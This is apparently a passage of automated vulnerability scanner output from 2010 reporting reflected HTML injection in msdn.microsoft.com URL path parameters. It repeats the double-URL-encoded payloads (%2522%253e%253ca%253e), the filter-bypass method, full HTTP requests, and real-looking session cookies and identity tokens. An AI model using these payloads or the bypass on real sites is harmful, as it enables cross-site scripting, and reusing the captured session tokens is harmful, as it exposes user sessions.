17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9223 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:51 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582938(v6e49d"><a>35d14fe12fc=office.11" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8440%2522%253e%253ca%253e0f47febd4eb was submitted in the REST URL parameter 1. This input was echoed as c8440"><a>0f47febd4eb in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usc8440%2522%253e%253ca%253e0f47febd4eb/library/dd582938(v=office.11).aspx HTTP/1.1 Host: msdn.microsoft.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=116E8h002j20101; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:57:22 GMT Content-Length: 9200
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usc8440"><a>0f47febd4eb/library/dd582938(v=office.11)" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efc86%2522%253e%253ca%253e3e864514c0b was submitted in the REST URL parameter 2. This input was echoed as efc86"><a>3e864514c0b in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/libraryefc86%2522%253e%253ca%253e3e864514c0b/dd582938(v=office.11).aspx HTTP/1.1 Host: msdn.microsoft.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=116E8h002j20101; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:57:54 GMT Content-Length: 9200
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryefc86"><a>3e864514c0b/dd582938(v=office.11)" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14105%2522%253e%253ca%253e4aaafa655d was submitted in the REST URL parameter 3. This input was echoed as 14105"><a>4aaafa655d in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/dd582938(v14105%2522%253e%253ca%253e4aaafa655d=office.11).aspx HTTP/1.1 Host: msdn.microsoft.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=116E8h002j20101; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:58:24 GMT Content-Length: 9198
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582938(v14105"><a>4aaafa655d=office.11)" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edda6%2522%253e%253ca%253e6e9b407ad3c was submitted in the REST URL parameter 1. This input was echoed as edda6"><a>6e9b407ad3c in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usedda6%2522%253e%253ca%253e6e9b407ad3c/library/dd582939(office.11 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9219 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:17 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usedda6"><a>6e9b407ad3c/library/dd582939(office.11" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0c3e%2522%253e%253ca%253e86fe33f7661 was submitted in the REST URL parameter 2. This input was echoed as a0c3e"><a>86fe33f7661 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/librarya0c3e%2522%253e%253ca%253e86fe33f7661/dd582939(office.11 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9219 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:33 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarya0c3e"><a>86fe33f7661/dd582939(office.11" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1089%2522%253e%253ca%253e1aa87e60d4f was submitted in the REST URL parameter 3. This input was echoed as e1089"><a>1aa87e60d4f in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/dd582939(office.11e1089%2522%253e%253ca%253e1aa87e60d4f HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
